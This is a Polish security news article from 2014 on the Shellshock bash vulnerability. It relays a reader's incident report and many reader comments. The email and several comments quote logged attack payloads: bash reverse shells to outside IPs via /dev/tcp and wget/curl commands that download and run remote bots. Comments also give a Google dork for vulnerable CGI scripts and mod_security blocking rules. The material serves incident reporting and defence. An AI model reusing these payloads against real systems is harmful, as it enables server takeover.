10:54
26/9/2014

Przedwczoraj informowaliśmy was o poważnej dziurze w bashu (niektórzy mówią, że poważniejszej niż Heartbleed) i zastanawialiśmy się ile czasu minie do momentu, kiedy w internecie pojawią się ataki z jej użyciem. Okazuje się, że wystarczyło kilkanaście godzin. Poniżej e-mail jaki otrzymaliśmy od jednego z czytelników, który chciał zachować anonimowość.

Z chęcią pokazalibyśmy logo podatności, ale wygląda na to, że jej autor podszedł bardzo nieprofesjonalnie do sprawy, i ogłosił lukę światu bez przygotowania odpowiedniej strategii marketingowej i opracowania graficznego ;)

Z chęcią pokazalibyśmy prawdziwe logo podatności, ale wygląda na to, że jej odkrywca podszedł bardzo nieprofesjonalnie do sprawy, i ogłosił lukę światu bez przygotowania odpowiedniej strategii marketingowej i opracowania graficznego… SKANDAL!!111 ;)

Atak w logach

Na serwerze którym się opiekuję (URL do wiadomości redakcji) jedna strona napisana jest w bashu (nie komentujcie tego proszę). No i dziś rano w logach zobaczyłem że ktoś już przeszukuje sieć pod kątem podatnych maszyn — i o zgrozo mnie znalazł :/

Poza niegroźnymi user-agentami w stylu () { :;}; /bin/bash -c \”echo test\”
i wysyłaniem maili na np. john666@mailinator.com trafiły się też [następujące payloady]:

() { :; }; /bin/bash -i > /dev/tcp/192.241.202.31/1235 0<&1 2>&1

() { :; }; /usr/bin/wget 192.241.202.31/shell1 -O /tmp/shell1 | /bin/chmod 777 /tmp/shell1 | /tmp/shell1

Przylazły z 203.90.235.27 i o ile wersja z /dev/tcp nic nie dała, o tyle ta druga już tak…

Z mojej absolutnie niefachowej analizy widzę, że ten plik (mający 155 B) po uruchomieniu ściąga normalnej wielkości binarkę z tego samego IP, czeka na komendy i coś wykonuje… (odpalony na maszynie wirtualnej poza tym nie robił nic szczególnie ciekawego). Na bieżącą chwilę adres jeszcze działa — plik można ściągnąć.

Na serwerze atak był od 6:30, ok. 9:00 nie było już w systemie uruchomionego żadnego procesu związanego z tym shell1 – nie wiem co się z nimi stało. Po logach widzę większy ruch sieciowy, poza tym nie widzę anomalii.

Pozostaje mi mieć nadzieję, że dzięki temu że atak był maszynowy a uprawnienia dostępu ograniczone głównie do plików jednego vhosta (mod.itk), to atak żadnych modyfikacji nie wprowadził. Jakie dane poszły w sieć — nie wiem :(

Hide Ya Everything!

Hide Ya Everything!

Z tego wszystkiego najbardziej zastanawia mnie to, że z kilku vhostów które są na tym samym IP atak poszedł tylko na jeden jedyny napisany w bashu, który nie jest ani odwrotnym odwzorowaniem dns, ani pierwszym alfabetycznie, ani najczęściej odwiedzanym. I z IP z których szedł atak, na żaden inny vhost nie było połączeń :/

Mam nadzieję że taki przykład pomoże przekonać gros komentujących o tym, ze jednak taka podatność jest groźna.

PS. Czytelnik wyraził chęć odpowiedzi na pytania — więc jeśli jakieś macie, pytajcie w komentarzach. Zapewne odpowie.

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

88 komentarzy

Dodaj komentarz
  1. Panie “webster”, i co pan na to, hmm? :)
    btw. ktoś ma może jakiś regex żeby dodać do fail2bana albo innego badziewia co by wycinać tego typu akcje?

    • Jeszcze kilka słów:
      1) “Mam nadzieję że taki przykład pomoże przekonać gro komentujących o tym (…)” < literówka – chyba chodziło o "grono" ;)
      2) Obecnie nie mam jak sprawdzić, czy może ktoś wie czy są już regułki w http://emergingthreats.net/ do tego?
      3) Czy ktoś przeprowadzał realne testy wykorzystania podatności przez cgi-bin?

      Pozdrawiam.

    • Chodziło o gros. Ale autor nie wie, że ten wyraz pisze się inaczej, niż czyta.

    • RedHat opublikował regułki do mod_security i innych tego typu narzędzi https://access.redhat.com/articles/1212303

    • Przecież webster nie negował że jest to podatność. Webster zauważył m.in że mówienie że jest “poważniejsza niż heartbleed” jest *dużą* przesadą.

      Owszem, zaprezentowano tutaj ciekawe włamanie się na server za pomocą tej podatności -> na stronę napisaną w BASHU. Ile z Twoich stron jest napisanych w bashu?

      Tak, są skrypty CGI, tak, jest DHCP, etc. Ale w ogólności, nie jest to gorszy vuln niż kolejny 0day na javę/wordpressa/flasha/adobe readera.

    • Jeszcze odnośnie testów podatności cgi-bin, ja testowałem na serwerze którym się opiekuje, ale nie udało mi się odnieść sukcesu.

    • @znachor

      Jak Sam autor napisał:

      Cyt. […] jedna strona napisana jest w bashu (nie komentujcie tego proszę). […]

      Na Jego prośbę, nie będziemy tego komentować :)

  2. Mam ubuntu, mam już wgrywac windę?

    • padłem XD

    • schody se wgraj

    • Vistę, jak exploity będą działały tak, jak normalne programy to będziesz w 100% bezpieczny

    • Tak, najlepiej towarowa!

  3. Wystarczy zaktualizować Ubuntu żeby dziury nie było?

    • Tak, jest już druga poprawka, naprawiająca to, co pominęła pierwsza.

    • Ubuntu 12/14.04 załatane, centos ponoć też ;)

    • Dzisiaj przed chwilą poszła trzecia poprawka na basha ;]

  4. Co robić, jak żyć?!

    • W apache’u wystarczy odpowiednio go skonfigurować przed wyjściem na świat, tak aby nie miał dostępu poza katalogiem vhosta, używać różnych WAF’ów, IDS’ów etc. :)

  5. Wygląda jakby ktoś znał infrastrukturę, taki wewnętrzny atak z zemsty albo coś. Ewentualnie ktoś mógł wykorzystać google dorka do znalezienia serwera i wtedy zaatakował tylko ten jeden serwer który pasował pod zapytanie.

  6. Kim są ci “Chińczycy” ?

    • Taki naród azjatycki.

    • … i skośne mordki mają.

    • Takie o: -.-

  7. Jak co zrobić, nie daj życiu się z adminem napij się, olej smutki, żale, baw się doskonale 😆

  8. Ubuntu uzywa dash jako /bin/sh, ktore nie ma buga. A jak ktos explicite pisze skrypty dla /bin/bash to ma za kare za hipsterstwo.

    • Piszę skrypty explicite pod /bin/bash. Jestę hipsterę? A może po prostu nie ma sensu używać tylko POSIXowego zakresu sh, gdy bash jest we wszystkich “gołych” normalnych distro? Jak piszę jakieś gówno-skrypty do automatyzacji powtarzalnych zadań, to nie mam ochoty jeszcze męczyć się z węższą wersją języka.

    • OJezu, to moze naucz sie Perla. Tak, uzywajac shella ktory ma /dev/tcp jestes hipsterem.

    • Można pisać specjalnie pod basha – nic w tym złego, pod warunkiem, że w shebangu wpiszesz basha, a nie /bin/sh. Niestety, nie wszyscy klepacze skryptów o tym pamiętają (lub nie wiedzą, że sh != bash).

  9. U mnie była próba tego /dev/tcp z 202.38.120.248.

  10. Mam pytanie do Was,
    w chacie postawiony serwer na debianie 6 jako serwer multimediów + nas (OMV). Całość jest za kilkoma NAT-ami, generalnie z zew niewidoczny. Mimo to bardzo duże zagrożenie dla mnie? Pytam bo nie jestem biegły w tych sprawach i prośba o szczerą odpowiedź.

    • O ile nie masz potrójnej ściany ognia, to ZAWSZE mogą się włamać emacs’em przez sendmail.

    • Dopisz do /etc/apt/sources.list dwie poniższe linijki:

      deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
      deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free

      potem apt-get update i apt-get install bash

    • Te repozytoria są jakieś dziwne.
      Jak zrobiłem whois debian.net to mi konsolę wyczyściło (były tam jakieś polecenia ukryte?

    • Dobra,
      Te “dziwne efekty” po wykonaniu whois były spowodowane przepełnieniem partycji /.

    • najlepiej po prostu usunąć basha

  11. Też w logach mam:
    89.207.135.125 – – [25/Sep/2014:08:30:34 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 518 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    • Tylko, że miałem system zaktualizowany :)

  12. Regolki do mod_security dla apacha

    SecRule REQUEST_HEADERS “^\(\) {” “phase:1,deny,id:1000000,t:urlDecode,status:400,log,msg:’CVE-2014-6271 – Bash Attack'”
    SecRule REQUEST_LINE “\(\) {” “phase:1,deny,id:1000001,status:400,log,msg:’CVE-2014-6271 – Bash Attack'”
    SecRule ARGS_NAMES “^\(\) {” “phase:2,deny,id:1000002,t:urlDecode,t:urlDecodeUni,status:400,log,msg:’CVE-2014-6271 – Bash Attack'”
    SecRule ARGS “^\(\) {” “phase:2,deny,id:1000003,t:urlDecode,t:urlDecodeUni,status:400,log,msg:’CVE-2014-6271 – Bash Attack'”
    SecRule FILES_NAMES “^\(\) {” “phase:2,deny,id:1000004,t:urlDecode,t:urlDecodeUni,status:400,log,msg:’CVE-2014-6271 – Bash Attack'”

  13. A u mnie takie:

    109.202.102.224 – – [25/Sep/2014:16:21:44 +0200] “GET /cgi-bin/hello HTTP/1.0” 404 211 “-” “() { :;}; /bin/bash -c \”cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\””

    • A u mnie tak:
      cat access.log.1 | grep bash
      46.113.4.191 – – [26/Sep/2014:19:26:47 +0200] “GET / HTTP/1.1” 200 6237 “https://niebezpiecznik.pl/post/dziura-w-bashu/” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0”

      Mam się bać?

    • @kitor http://blog.sanctum.geek.nz/useless-use-of-cat/

  14. ano chodzą robociki…

    82.165.144.187 – – [25/Sep/2014:18:10:59 +0200] “GET / HTTP/1.1” 200 – “-” “() { :; }; /usr/bin/wget 82.165.144.187/aaaaaaaaaaaa”
    94.23.193.131 – – [26/Sep/2014:05:42:52 +0200] “GET / HTTP/1.0” 200 – “-” “() { :;}; /bin/bash -c ‘bash -i >& /dev/tcp/195.225.34.101/3333 0>&1′”

  15. U mnie też się pojawiło:
    89.207.135.125 – – [25/Sep/2014:08:04:45 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 1125 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”
    80 89.207.135.125 – – [25/Sep/2014:08:04:45 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 1424 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”
    89.207.135.125 – – [25/Sep/2014:08:04:45 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 1125 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

  16. 209.126.230.72 – – [25/Sep/2014:01:25:07 +0200] “GET / HTTP/1.0” 200 35843 “() { :; }; ping -c 11 209.126.230.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) Dobree :D

  17. Bro zalogował Masscan od Roberta Grahama:
    1411626054.820908 Cs94Z14K7rocAXRfn6 209.126.230.72 57655 81.95.119.49 80 1 GET () { / () { :; }; ping -c 11 209.126.230.74 shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) 0 349 400 Bad Request – – – (empty) – – – – – FxPGcG1WXyu2IfuPja application/xml
    1411646784.706346 CaxQsx3xd6vVa2tax8 89.207.135.125 60000

    i drugiego “ciekawskiego”:
    81.95.119.49 80 1 GET -/cgi-sys/defaultwebpage.cgi – () { :;}; /bin/ping -c 1 198.101.206.138 0 345 404 Not Found – – – (empty) – – – – – FGkrXS3RrjOL1gZVOi application/xml

    • z innej beczki – używasz Bro na jakimś względnie “dużym” środowisku? Tzn. czy dużo tam loguje ;)
      Pozdrawiam.

    • @znachor

      Bro wpadł mi w oko jako część Security Onion. Używam na jednym serwerze, bardziej jako mechanizm do logowania ruchu/statystyk niż IDS (ja robię za IDS – od czasu do czasu rzut oka na email ze statystykami od Bro czy nie widać jakichś dziwnych anomalii). Do tego OSSEC i na małe potrzeby wystarczy. Na duże środowisko ma potencjał, ale trzeba dobrze przemyśleć co się chce osiągnąć – mnóstw opcji konfiguracyjnych, pluginy itd. IMO naprawdę zgrabne rozwiązanie pomiędzy zbieraniem logów a FPC. Do poczytania: http://blog.opensecurityresearch.com/2014/03/identifying-malware-traffic-with-bro.html

    • Wiem bo bro bawię się od dłuższego czasu lecz jeszcze nie wprowadzam go w większe środowiska ;)
      Fajnie wiedzieć że są ludzie którzy się tym interesują z pl :)

  18. Ja miałem w logach coś takiego:
    89.207.135.125 – – [25/Sep/2014:12:41:01 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 500 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    • a u mnie był ten sam IP oraz zmodyfikowana opcja z innego IP.
      209.126.230.72 – – [25/Sep/2014:03:17:15 +0200] “GET / HTTP/1.0” 200 362 “() { :; }; ping -c 11 209.126.230.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
      89.207.135.125 – – [25/Sep/2014:09:09:45 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 411 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

  19. Na fedorze po aktualizacji basha nadal ma ten błąd. Ktoś z fedorą ma do czynienia?

  20. U mnie dzisiaj takie kwiatki:
    209.126.230.72 – – [25/Sep/2014:09:04:41 +0200] “GET / HTTP/1.0” 403 482 “() { :; }; ping -c 11 209.126.230.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
    89.207.135.125 – – [25/Sep/2014:14:05:14 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 403 484 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    • Dork:
      inurl:/cgi-bin/ filetype:sh -git

  21. To zależy na której fedzi … ja mam 16 – nie wiem co mam z nią zrobić. Mam 18 – też gryzę się z myślami co by tutaj z nią zrobić .. na 19 i 20 jest już ok

  22. A nie prościej zablokować wszystkie IP z Regionu Chin, Oceanii i krajów które na pewno nie będą zainteresowane Waszymi stronami czy serwerami.

    • +1 za inteligencje

    • No bardzo fajny pomysl…Moze od razu ustawic iptables zeby przyjmowala polaczenia wylacznie z 127.0.0.1?
      Wiem, ze bycmoze dla Ciebie juz samo wyjscie z serwerowni na swieze powietrze moze byc poza Twoja “comfort zone”, ale uwierz mi, sa Polacy, ktorzy nawet korzystaja z samolotow.
      Pozdro z Wuhan (武汉)

    • A blokuj blokuj, i tak korzystam z VPNa w Warszawce bo zwyczajnie mi europejskie internety lepiej chodzą niż z łączy mojego operatora opus.

      Pozdrowionka z Perth (Fremantle), Australia ;)

  23. dla stron na bashu jest bash on balls ;)

  24. :( zdaje się że ten chińczyk przestał rozsyłać drugą część payloadu albo jest na tyle cwany, że nie pozwala innym IPkom niż cel się połączyć. Po otwarciu połączenia na porcie 1233, na którym powinienem dostać coś ciekawego nie ma nic. Chociaż fakt, że samego połączenia nie odrzuca.

  25. Czy ktoś poda składnię do wgeta, żeby potestować czy działa?

  26. Do debiana wheezy już trzeci dzień z rzędu lecą poprawki do basha i jego bibliotek z security.debian.org

  27. U mnie parę tego typu requestów … :)
    70.42.149.85 – – [26/Sep/2014:23:45:21 +0200] “GET /test HTTP/1.0” 404 4676 “-” “() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22”

  28. http://twitpic.com/ec3615

  29. Polskie spec-służby też korzystają z tej “dziury” ale nikt o tym nie mówi głośno :)
    Wszystko zwalimy na chinoli … :D

  30. Systemy closed-source działają tak jakby cały czas były pod działaniem jakichś sił nieczystych. Jedna wielka zamuła.
    Jak zdarzy mnie się pracować na Windowsie (z przymusu) to odnoszę wrażenie, że nie tylko NSA ale MI6 i Mossad również na nim pracuje.

    Stallman ma rację. Nie ma co panikować.
    To co się dzieje ze znajdowaniem bugów i całe to “publicity” to tylko rezultat tego, że świat informatyczny opanowywany jest przez Linuksa i Uniksa.
    Patchujesz bash w 15 sekund, problem z głowy i nawet nie musisz restartować jak Windowsa.
    Z łatami zawsze tak było, że jest ten czas przez załataniem przynoszący dreszcze emocji.
    Informatyków i programistów życie jest bardzo stacjonarne. Nie żałujcie im adrenaliny.

    • To na pewno będzie rok linuksa na desktopie. Życzę sukcesów przy uruchamianiu SolidWorksa i Altiuma na KucOSie.

  31. ShellShock ?
    http://kickass.to/va-shellshock-lp-vol-1-2013-t7356358.html ?
    xD

  32. A jak sprawa wygląda w przypadku powłoki fish?

  33. A więc mamy kolejnego kandydata :)
    http://stablehost.us/bots/regular.bot
    http://stablehost.us/bots/kaiten.c
    http://stablehost.us/bots/pl
    Pozdrawiam :)

  34. | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
    | () { :; }; rm -rf /bin/bash |
    | __________________|
    (\__/) ||
    (•ㅅ•) ||
    /   づ”

    • Trzeba mieć najpierw roota! :)

  35. Generalnie łatka poszła zaraz po tym jak przeczytałem o tej luce.
    Od tamtej pory pełno wpisów w rodzaju:
    – niegroźnych
    209.126.230.72 – – [25/Sep/2014:08:13:37 +0200] “GET / HTTP/1.0” 200 454 “() { :; }; ping -c 11 209.126.230.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”

    – ET phone home
    89.207.135.125 – – [25/Sep/2014:13:55:41 +0200] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 502 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    – a nawet takich
    173.45.100.18 – – [28/Sep/2014:22:58:11 +0200] “GET /cgi-bin/hi HTTP/1.0” 404 491 “-” “() { :;}; /bin/bash -c \”cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\””

    …pomijając dużo exploitów na phpmyadmina, joomlę, i inne takie.
    Co ciekawe – serwer stoi za popularnym dyndnsem oprócz dyndnsowej domeny ma jeszcze “normalną”.

  36. Mam takie pytanie. Kod źródłowy łatki do bash-a znalazłem na https://ftp.gnu.org/gnu/bash/
    Czy dystrybucje wrzucają do swoich repozytoriów tamtą łatkę czy każda na swoją rękę łata problem i publikuje w repo?

  37. a logi puchna:

    [Mon Sep 29 09:22:18.340722 2014] [:error] [pid 27986:tid 140488338220800] [client 173.45.100.18] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file “/etc/httpd/crs/activated_rules/modsecurity_crs_21_protocol_anomalies.conf”] [line “47”] [id “960015”] [rev “1”] [msg “Request Missing an Accept Header”] [severity “NOTICE”] [ver “OWASP_CRS/2.2.9”] [maturity “9”] [accuracy “9”] [tag “OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT”] [tag “WASCTC/WASC-21”] [tag “OWASP_TOP_10/A7”] [tag “PCI/6.5.10”] [hostname “91.x.x.x”] [uri “/cgi-bin/hi”] [unique_id “VCkIqlvZ3aIAAG1S10QAAAAV”]

    albo:

    46.105.14.134 – – [29/Sep/2014:12:59:25 +0100] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 403 510 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:30 +0100] “GET /admin.cgi HTTP/1.1” 403 493 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:34 +0100] “GET /tmUnblock.cgi HTTP/1.1” 403 497 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:38 +0100] “GET /cgi-bin/test-cgi HTTP/1.1” 404 496 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:42 +0100] “GET /cgi-bin/hello HTTP/1.1” 404 493 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:46 +0100] “GET /cgi-sys/entropysearch.cgi HTTP/1.1” 403 509 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:50 +0100] “GET /cgi-mod/index.cgi HTTP/1.1” 403 501 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:54 +0100] “GET /cgi-bin/test.cgi HTTP/1.1” 404 496 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:12:59:58 +0100] “GET /cgi-bin-sdb/printenv HTTP/1.1” 403 504 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””
    46.105.14.134 – – [29/Sep/2014:13:00:02 +0100] “GET /cgi-bin/ HTTP/1.1” 403 492 “-” “() { :;}; /bin/bash -c \”wget http://217.12.204.127/bin\””

  38. Dla wszystkich, którzy z jakiś względów nie mogą aktualizować starej EoF Fedory http://stevejenkins.com/blog/2014/09/how-to-manually-update-bash-to-patch-shellshock-bug-on-older-fedora-based-systems/
    :)

  39. https://github.com/DanMcInerney/shellshock-hunter/

    Z czego korzystają ‘Kitajce’?

  40. Właśnie pojawiła się kolejna aktualizacja bezpieczeństwa dla joomli, ciekawe co tym razem poprawili :)

  41. To nie działa na systemach ktore stosują dash zamiast bash, na debianie cholercia dziala

  42. @waldeq
    Możesz mi powiedzieć jaki jest sens używania Fedory?

    • pewnie taki, że nie potrafi skonfigurować debiana, genta albo slacka ;)

Odpowiadasz na komentarz h4X0r

Kliknij tu, aby anulować

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: